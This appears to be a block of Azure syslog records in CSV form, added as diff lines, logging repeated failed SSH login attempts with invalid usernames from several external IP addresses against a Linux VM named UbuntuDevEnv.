+4172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:53:14,UbuntuDevEnv,2019-06-26 13:53:14,auth,UbuntuDevEnv,info,Disconnected from invalid user dpi 157.230.115.27 port 54018 [preauth],647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dpi,157.230.115.2,54018,,
+4173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:53:37,UbuntuDevEnv,2019-06-26 13:53:36,auth,UbuntuDevEnv,info,Invalid user wangzc from 196.46.36.144 port 40992,715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wangzc,196.46.36.1,40992,,
+4174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:53:37,UbuntuDevEnv,2019-06-26 13:53:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:53:37,UbuntuDevEnv,2019-06-26 13:53:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+4176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:53:39,UbuntuDevEnv,2019-06-26 13:53:38,auth,UbuntuDevEnv,info,Failed password for invalid user wangzc from 196.46.36.144 port 40992 ssh2,715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wangzc,196.46.36.1,40992,,
+4177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:53:39,UbuntuDevEnv,2019-06-26 13:53:39,auth,UbuntuDevEnv,info,Disconnected from invalid user wangzc 196.46.36.144 port 40992 [preauth],715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wangzc,196.46.36.1,40992,,
+4178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:53:39,UbuntuDevEnv,2019-06-26 13:53:39,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 40992:11: Bye Bye [preauth],715,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,40992,,
+4179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:54:53,UbuntuDevEnv,2019-06-26 13:54:52,auth,UbuntuDevEnv,info,Invalid user salome from 157.230.115.27 port 43146,995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,salome,157.230.115.2,43146,,
+4180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:54:53,UbuntuDevEnv,2019-06-26 13:54:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:54:53,UbuntuDevEnv,2019-06-26 13:54:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+4182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:54:54,UbuntuDevEnv,2019-06-26 13:54:54,auth,UbuntuDevEnv,info,Failed password for invalid user salome from 157.230.115.27 port 43146 ssh2,995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,salome,157.230.115.2,43146,,
+4183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:54:54,UbuntuDevEnv,2019-06-26 13:54:54,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 43146:11: Bye Bye [preauth],995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,43146,,
+4184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:54:54,UbuntuDevEnv,2019-06-26 13:54:54,auth,UbuntuDevEnv,info,Disconnected from invalid user salome 157.230.115.27 port 43146 [preauth],995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,salome,157.230.115.2,43146,,
+4185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:56:11,UbuntuDevEnv,2019-06-26 13:56:11,auth,UbuntuDevEnv,info,Invalid user confluence from 196.46.36.144 port 49159,1284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,confluence,196.46.36.1,49159,,
+4186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:56:11,UbuntuDevEnv,2019-06-26 13:56:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,1284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+4187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:56:11,UbuntuDevEnv,2019-06-26 13:56:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:56:13,UbuntuDevEnv,2019-06-26 13:56:13,auth,UbuntuDevEnv,info,Failed password for invalid user confluence from 196.46.36.144 port 49159 ssh2,1284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,confluence,196.46.36.1,49159,,
+4189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:56:14,UbuntuDevEnv,2019-06-26 13:56:13,auth,UbuntuDevEnv,info,Disconnected from invalid user confluence 196.46.36.144 port 49159 [preauth],1284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,confluence,196.46.36.1,49159,,
+4190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:56:14,UbuntuDevEnv,2019-06-26 13:56:13,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 49159:11: Bye Bye [preauth],1284,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,49159,,
+4191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:56:39,UbuntuDevEnv,2019-06-26 13:56:38,auth,UbuntuDevEnv,info,Invalid user broke from 157.230.115.27 port 60506,1400,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,broke,157.230.115.2,60506,,
+4192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:56:39,UbuntuDevEnv,2019-06-26 13:56:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,1400,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+4193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:56:39,UbuntuDevEnv,2019-06-26 13:56:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1400,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:56:41,UbuntuDevEnv,2019-06-26 13:56:41,auth,UbuntuDevEnv,info,Failed password for invalid user broke from 157.230.115.27 port 60506 ssh2,1400,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,broke,157.230.115.2,60506,,
+4195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:56:41,UbuntuDevEnv,2019-06-26 13:56:41,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 60506:11: Bye Bye [preauth],1400,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,60506,,
+4196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:56:41,UbuntuDevEnv,2019-06-26 13:56:41,auth,UbuntuDevEnv,info,Disconnected from invalid user broke 157.230.115.27 port 60506 [preauth],1400,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,broke,157.230.115.2,60506,,
+4197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:57:19,UbuntuDevEnv,2019-06-26 13:57:18,auth,UbuntuDevEnv,info,Invalid user nrpe from 68.183.50.149 port 41966,1542,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nrpe,68.183.50.1,41966,,
+4198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:57:19,UbuntuDevEnv,2019-06-26 13:57:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1542,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:57:19,UbuntuDevEnv,2019-06-26 13:57:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,1542,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:57:20,UbuntuDevEnv,2019-06-26 13:57:20,auth,UbuntuDevEnv,info,Failed password for invalid user nrpe from 68.183.50.149 port 41966 ssh2,1542,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nrpe,68.183.50.1,41966,,
+4201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:57:20,UbuntuDevEnv,2019-06-26 13:57:20,auth,UbuntuDevEnv,info,Disconnected from invalid user nrpe 68.183.50.149 port 41966 [preauth],1542,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nrpe,68.183.50.1,41966,,
+4202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:57:20,UbuntuDevEnv,2019-06-26 13:57:20,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 41966:11: Bye Bye [preauth],1542,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,41966,,
+4203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:00:01,UbuntuDevEnv,2019-06-26 14:00:01,auth,UbuntuDevEnv,info,Invalid user hugo from 157.230.115.27 port 38766,2123,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hugo,157.230.115.2,38766,,
+4204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:00:01,UbuntuDevEnv,2019-06-26 14:00:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2123,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:00:01,UbuntuDevEnv,2019-06-26 14:00:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,2123,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+4206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:00:03,UbuntuDevEnv,2019-06-26 14:00:03,auth,UbuntuDevEnv,info,Failed password for invalid user hugo from 157.230.115.27 port 38766 ssh2,2123,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hugo,157.230.115.2,38766,,
+4207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:00:03,UbuntuDevEnv,2019-06-26 14:00:03,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 38766:11: Bye Bye [preauth],2123,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,38766,,
+4208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:00:03,UbuntuDevEnv,2019-06-26 14:00:03,auth,UbuntuDevEnv,info,Disconnected from invalid user hugo 157.230.115.27 port 38766 [preauth],2123,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hugo,157.230.115.2,38766,,
+4209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:00:44,UbuntuDevEnv,2019-06-26 14:00:43,auth,UbuntuDevEnv,info,Invalid user appuser from 68.183.50.149 port 50558,2365,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,appuser,68.183.50.1,50558,,
+4210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:00:44,UbuntuDevEnv,2019-06-26 14:00:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2365,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:00:44,UbuntuDevEnv,2019-06-26 14:00:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,2365,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:00:46,UbuntuDevEnv,2019-06-26 14:00:46,auth,UbuntuDevEnv,info,Failed password for invalid user appuser from 68.183.50.149 port 50558 ssh2,2365,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,appuser,68.183.50.1,50558,,
+4213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:00:46,UbuntuDevEnv,2019-06-26 14:00:46,auth,UbuntuDevEnv,info,Disconnected from invalid user appuser 68.183.50.149 port 50558 [preauth],2365,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,appuser,68.183.50.1,50558,,
+4214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:00:46,UbuntuDevEnv,2019-06-26 14:00:46,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 50558:11: Bye Bye [preauth],2365,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,50558,,
+4215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:01:31,UbuntuDevEnv,2019-06-26 14:01:31,auth,UbuntuDevEnv,info,Invalid user conta from 196.46.36.144 port 37262,2525,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,conta,196.46.36.1,37262,,
+4216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:01:31,UbuntuDevEnv,2019-06-26 14:01:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,2525,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+4217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:01:31,UbuntuDevEnv,2019-06-26 14:01:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2525,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:01:34,UbuntuDevEnv,2019-06-26 14:01:33,auth,UbuntuDevEnv,info,Failed password for invalid user conta from 196.46.36.144 port 37262 ssh2,2525,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,conta,196.46.36.1,37262,,
+4219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:01:34,UbuntuDevEnv,2019-06-26 14:01:33,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 37262:11: Bye Bye [preauth],2525,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,37262,,
+4220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:01:34,UbuntuDevEnv,2019-06-26 14:01:33,auth,UbuntuDevEnv,info,Disconnected from invalid user conta 196.46.36.144 port 37262 [preauth],2525,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,conta,196.46.36.1,37262,,
+4221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:18,UbuntuDevEnv,2019-06-26 14:06:18,auth,UbuntuDevEnv,info,Invalid user proxyuser from 180.76.96.9 port 53816,3548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,proxyuser,180.76.96.9,53816,,
+4222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:18,UbuntuDevEnv,2019-06-26 14:06:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:18,UbuntuDevEnv,2019-06-26 14:06:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,3548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+4224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:20,UbuntuDevEnv,2019-06-26 14:06:20,auth,UbuntuDevEnv,info,Failed password for invalid user proxyuser from 180.76.96.9 port 53816 ssh2,3548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,proxyuser,180.76.96.9,53816,,
+4225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:21,UbuntuDevEnv,2019-06-26 14:06:20,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 53816:11: Bye Bye [preauth],3548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,53816,,
+4226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:21,UbuntuDevEnv,2019-06-26 14:06:20,auth,UbuntuDevEnv,info,Disconnected from invalid user proxyuser 180.76.96.9 port 53816 [preauth],3548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,proxyuser,180.76.96.9,53816,,
+4227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:36,UbuntuDevEnv,2019-06-26 14:06:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,3612,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:36,UbuntuDevEnv,2019-06-26 14:06:36,auth,UbuntuDevEnv,info,Invalid user deepthi from 68.183.50.149 port 33678,3612,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deepthi,68.183.50.1,33678,,
+4229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:36,UbuntuDevEnv,2019-06-26 14:06:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3612,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:39,UbuntuDevEnv,2019-06-26 14:06:38,auth,UbuntuDevEnv,info,Failed password for invalid user deepthi from 68.183.50.149 port 33678 ssh2,3612,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deepthi,68.183.50.1,33678,,
+4231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:39,UbuntuDevEnv,2019-06-26 14:06:38,auth,UbuntuDevEnv,info,Disconnected from invalid user deepthi 68.183.50.149 port 33678 [preauth],3612,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deepthi,68.183.50.1,33678,,
